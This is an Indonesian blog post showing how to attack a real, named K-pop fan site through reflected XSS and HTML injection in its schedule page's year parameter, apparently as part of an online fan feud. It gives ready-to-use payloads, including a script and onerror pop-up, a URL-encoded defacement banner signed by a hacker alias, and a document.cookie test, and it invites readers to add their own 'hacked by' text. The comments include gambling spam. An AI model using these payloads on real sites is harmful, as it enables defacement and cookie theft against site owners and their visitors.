Reflected XSS pada website BTS Kpop

Reemar Garis Keras!.

Belakangan ini ramai pembahasan mengenai Remar Vs BTS yang dimana  para betina +62 meributkan nya,

Dan salah satu Reemar Garis Keras pun bertindak mencoba menyerang melewati situs BTS yaitu https://ibighit.com/bts/

Dan hal hasil salah satu Reemar Garis Keras pun berhasil menyerang ke situs BTS yang dimana situs itu memiliki Bug yang akan kita bahas kali ini.

langsung aja sesuai judul Reflected XSS pada website BTS Kpop :v


Saya mendapatkan informasi mengenai penemuan Bug pada website BTS dari teman saya yang di kubu Reemar Garis Keras

Bug yang dia dapatkan adalah, Bug HTML Injection & XSS, Url Poisoning, pada Colum schedule di Pencarian Tahun,

Link dibawah ini.


Oke langsung aja tanpa banyak bacot skuyy ahh

Kyta masukan payload nya aja gaes

Payload XSS print Nick

'"><script></script>'"><img src=x onerror=prompt(1);>

Setelah memasukkan Payload jika masih vuln akan muncu pop up seperti ini



Oke Kyta lanjut ke Html Injection ya guys sama seperti tadi

https://ibighit.com/bts/eng/schedule/?year=

Lalu kita masukkan pay load dibawah ini

%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./CR0T_D1LU4R%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

Jika masih vuln akan muncul gambar seperti ini :


Oke yang selanjutnya ialah XSS get cookie

https://ibighit.com/bts/eng/schedule/?year=

Setelah itu kalian masukkan payload ini

<img src=asdf onerror=alert(document.cookie)>

Yang nanti akan muncul seperti dibawah ini



Kyta lanjut yang terakhir yaitu ialah Url Poisoning 
Masih tetap dan kalian kasih aja heked by kalian:v
Example nya


Clingggg taraaaaa!!!!
Oke mungkin sekian dari gw thanks


BUC1N Hanya seorang otaku yang gemar dengan it

6 Responses to "Reflected XSS pada website BTS Kpop"

  1. Buat Dengan Video Dong Min Biar Lebih Jelas Lagi 😀

    ReplyDelete
  2. Kasih url live buat demo

    ReplyDelete
  3. Pakde video bro biar enak
    Saran aja si

    ReplyDelete
  4. Linkaja88 Agen Judi Online Deposit Linkaja Terpercaya Di Indonesia !

    Bonus Spesial 100% Untuk Taruhan Sabung Ayam Online & Live Casino !
    S128 | SV388 | BACCARAT | ROULETTE | REDTIGER | SICBO DADU | BLACKJACK | NIUNIU

    Tersedia Juga Permainan Lengkap Lainnya :
    • Tembak Ikan Online
    • Sportsbook / Taruhan Bola
    • Slot Online
    • Bingo
    • Bola Tangkas
    • Poker Online
    • Domino QQ
    • Ceme
    • Capsa Susun
    • Adu Q

    Pendaftaran Hubungi Kontak Resmi Kami Dibawah ini (Online 24 Jam Setiap Hari) :

    » Nomor WhatsApp : 0812–2222–995
    » ID Telegram : @bolavitacc
    » ID Wechat : Bolavita
    » ID Line : cs_bolavita

    ReplyDelete

Iklan Tengah Artikel 2